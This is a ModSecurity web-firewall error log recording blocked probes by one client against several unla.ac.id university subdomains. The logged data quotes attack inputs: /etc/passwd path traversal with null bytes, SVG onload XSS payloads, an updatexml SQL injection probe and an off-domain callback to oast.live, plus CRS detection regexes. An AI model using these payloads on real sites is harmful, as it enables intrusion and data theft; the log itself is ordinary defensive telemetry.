[Tue Aug 29 11:41:22.568496 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO128sCo-f0AAAcqJOQAAAAG"]
[Tue Aug 29 11:41:23.363998 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAc2dRUAAAAN"]
[Tue Aug 29 11:41:23.369489 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAc0NfUAAAAM"]
[Tue Aug 29 11:41:23.369576 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAcbSEkAAAAv"]
[Tue Aug 29 11:41:23.371612 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAQkBbUAAAAC"]
[Tue Aug 29 11:41:23.392376 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO1288Co-f0AAAc0NfYAAAAM"]
[Tue Aug 29 11:41:23.451455 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAcbSE0AAAAv"]
[Tue Aug 29 11:41:23.454439 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAc0NfkAAAAM"]
[Tue Aug 29 11:41:23.472053 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAYf-RcAAAAD"]
[Tue Aug 29 11:41:24.385329 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAActbMYAAAAH"]
[Tue Aug 29 11:41:24.406891 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAQkBbwAAAAC"]
[Tue Aug 29 11:41:24.408389 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAc2dRsAAAAN"]
[Tue Aug 29 11:41:24.431527 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcoNV0AAAAF"]
[Tue Aug 29 11:41:24.455742 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc2dR0AAAAN"]
[Tue Aug 29 11:41:24.461800 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129MCo-f0AAAc4EoEAAAAP"]
[Tue Aug 29 11:41:24.471509 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-RwAAAAD"]
[Tue Aug 29 11:41:24.488920 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcbSFMAAAAv"]
[Tue Aug 29 11:41:24.508500 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcbSFQAAAAv"]
[Tue Aug 29 11:41:24.515592 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-R4AAAAD"]
[Tue Aug 29 11:41:24.547476 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAc4EoUAAAAP"]
[Tue Aug 29 11:41:24.548364 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAActbMwAAAAH"]
[Tue Aug 29 11:41:24.556355 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO129MCo-f0AAAYf-SAAAAAD"]
[Tue Aug 29 11:41:25.415482 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAYf-SMAAAAD"]
[Tue Aug 29 11:41:25.424354 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc0Nf0AAAAM"]
[Tue Aug 29 11:41:25.429471 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAc2dSYAAAAN"]
[Tue Aug 29 11:41:25.432936 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAQkBccAAAAC"]
[Tue Aug 29 11:41:25.464619 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dScAAAAN"]
[Tue Aug 29 11:41:25.467705 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc0Nf4AAAAM"]
[Tue Aug 29 11:41:25.484879 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dSgAAAAN"]
[Tue Aug 29 11:41:25.484902 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAaZ9tAAAAAo"]
[Tue Aug 29 11:41:25.506981 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129cCo-f0AAAc2dSkAAAAN"]
[Tue Aug 29 11:41:25.526278 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dSoAAAAN"]
[Tue Aug 29 11:41:25.536901 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAYf-SgAAAAD"]
[Tue Aug 29 11:41:25.548915 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAcoNWYAAAAF"]
[Tue Aug 29 11:41:25.553629 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAQkBcwAAAAC"]
[Tue Aug 29 11:41:26.359765 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc2dS4AAAAN"]
